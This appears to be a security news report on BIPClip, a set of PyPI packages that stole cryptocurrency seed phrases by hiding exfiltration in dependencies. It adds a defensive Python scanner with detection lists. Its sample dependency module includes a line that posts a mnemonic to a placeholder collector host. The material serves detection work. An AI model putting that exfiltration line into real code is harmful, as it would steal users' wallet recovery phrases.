Threat hunters have uncovered a collection of seven packages on the Python Package Index (PyPI) repository designed to steal BIP39 mnemonic phrases used to recover private keys of cryptocurrency wallets.
This software supply chain attack campaign, named BIPClip by ReversingLabs, had a combined download count of 7,451 before removal from PyPI. The list of packages includes –
BIPClip, targeting developers of cryptocurrency wallet projects, has been active since at least December 4, 2022, with the first appearance of hashdecrypt on the registry.
“This is the latest instance of a software supply chain campaign targeting crypto assets,” said security researcher Karlo Zanki in a report to The Hacker News. “It underscores the ongoing trend of cryptocurrency being a prime target for supply chain threat actors.”
One of the packages, mnemonic_to_address, was designed to evade detection by appearing harmless, with the malicious code hidden in a dependency named bip39-mnemonic-decrypt.
The primary goal of the package is to steal mnemonic phrases and send the data to a server controlled by the threat actor.
Another two packages, public-address-generator and erc20-scanner, operate similarly, sending the stolen phrases to a central command-and-control server.
hashdecrypts works on its own: the data-stealing code is embedded in the package itself rather than pulled in through a dependency, but it performs the same theft.
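The pattern described above, a package that handles seed phrases and hides outbound exfiltration in a dependency, is something a defender can look for before installing. The following is an added example, not code from ReversingLabs or The Hacker News: a small static scanner built on Python's standard `ast` module that flags a module only when it both references mnemonic-related identifiers and makes calls into a networking library, resolving import aliases so `import requests as r` is still caught. The hint lists, the module names and the two sample sources are constructed for the example; the placeholder host is not from the report.

```python
import ast
from dataclasses import dataclass, field

# Identifier fragments suggesting a module handles BIP39 seed phrases.
# Constructed heuristic list for this example, not taken from the report.
MNEMONIC_HINTS = ("mnemonic", "bip39", "seed_phrase", "wordlist")

# Modules whose calls can move data off the host. Constructed list.
NETWORK_MODULES = ("requests", "urllib", "http.client", "socket", "aiohttp")


@dataclass
class Finding:
    filename: str
    mnemonic_refs: set = field(default_factory=set)
    network_calls: set = field(default_factory=set)

    @property
    def suspicious(self) -> bool:
        # What matters is the combination: seed-phrase handling plus outbound traffic.
        return bool(self.mnemonic_refs) and bool(self.network_calls)


def _dotted(node: ast.AST) -> str:
    """Turn an Attribute/Name chain such as r.post into 'r.post' ('' if not resolvable)."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return ""


def _is_network(dotted: str) -> bool:
    return any(dotted == m or dotted.startswith(m + ".") for m in NETWORK_MODULES)


def scan_source(filename: str, source: str) -> Finding:
    """Scan one module. Pass 1 collects import aliases, pass 2 inspects calls and names."""
    finding = Finding(filename)
    tree = ast.parse(source, filename=filename)
    aliases = {}  # local name -> fully qualified imported name
    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            for a in node.names:
                aliases[a.asname or a.name] = a.name
        elif isinstance(node, ast.ImportFrom) and node.module:
            for a in node.names:
                aliases[a.asname or a.name] = f"{node.module}.{a.name}"
    for node in ast.walk(tree):
        if isinstance(node, ast.Call):
            name = _dotted(node.func)
            if name:
                root, _, rest = name.partition(".")
                resolved = aliases.get(root, root) + ("." + rest if rest else "")
                if _is_network(resolved):
                    finding.network_calls.add(resolved)
        # Identifiers, parameters and string literals that mention seed phrases
        text = None
        if isinstance(node, ast.Name):
            text = node.id
        elif isinstance(node, ast.Attribute):
            text = node.attr
        elif isinstance(node, ast.arg):
            text = node.arg
        elif isinstance(node, ast.Constant) and isinstance(node.value, str):
            text = node.value
        if text and any(h in text.lower() for h in MNEMONIC_HINTS):
            finding.mnemonic_refs.add(text)
    return finding


def suspicious_files(files: dict) -> list:
    """Scan a package together with its resolved dependencies (filename -> source)."""
    return sorted(f for f, src in files.items() if scan_source(f, src).suspicious)


# Constructed sample: a harmless-looking top-level module that only derives an address.
WALLET_MODULE = '''
from seedphrase_util import decrypt_mnemonic  # constructed dependency name

def derive_address(mnemonic_words):
    seed = decrypt_mnemonic(mnemonic_words)
    return "0x" + seed[:40]
'''

# Constructed sample: the dependency where the exfiltration actually lives.
DEPENDENCY_MODULE = '''
import requests as r

def decrypt_mnemonic(mnemonic):
    r.post("https://collector.example.invalid/upload", json={"m": mnemonic})
    return mnemonic.replace(" ", "")
'''

if __name__ == "__main__":
    for fname, src in {"wallet.py": WALLET_MODULE, "dep.py": DEPENDENCY_MODULE}.items():
        f = scan_source(fname, src)
        print(fname, "suspicious" if f.suspicious else "clean", sorted(f.network_calls))
```

Scanning the top-level module alone reports it clean, which is exactly why the campaign hid the network code in a dependency; the check only becomes useful when it is run over the full resolved dependency tree, which is what `suspicious_files` does.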
ReversingLabs also found references to a GitHub profile named “HashSnake,” promoting a repository called hCrypto as a tool to extract mnemonic phrases from crypto wallets using hashdecrypts.
A deeper look into the repository’s commit history reveals a year-long campaign that evolved from importing the hashdecrypt package to hashdecrypts, the version uploaded on PyPI on March 1, 2024.
The campaign operators also maintain a presence on Telegram and YouTube, showcasing tools like xMultiChecker 2.0 targeting crypto assets.
“The packaging of these discovered packages was intentionally made less suspicious, focusing solely on compromising crypto wallets for theft,” Zanki mentioned.
“With no broader agenda, this campaign evaded security measures within impacted organizations.”
This incident highlights the security risks present in open-source package repositories, compounded by legitimate platforms like GitHub being exploited as a distribution channel for malware.
Abandoned projects serve as attractive targets for threat actors to hijack developer accounts and publish trojanized versions, leading to major supply chain threats.
“Abandoned digital assets remain a potent threat, as attackers leverage them to infiltrate open-source ecosystems,” noted Checkmarx recently.
Case studies like MavenGate and CocoaPods showcase the risks of abandoned domains being used for malicious intent.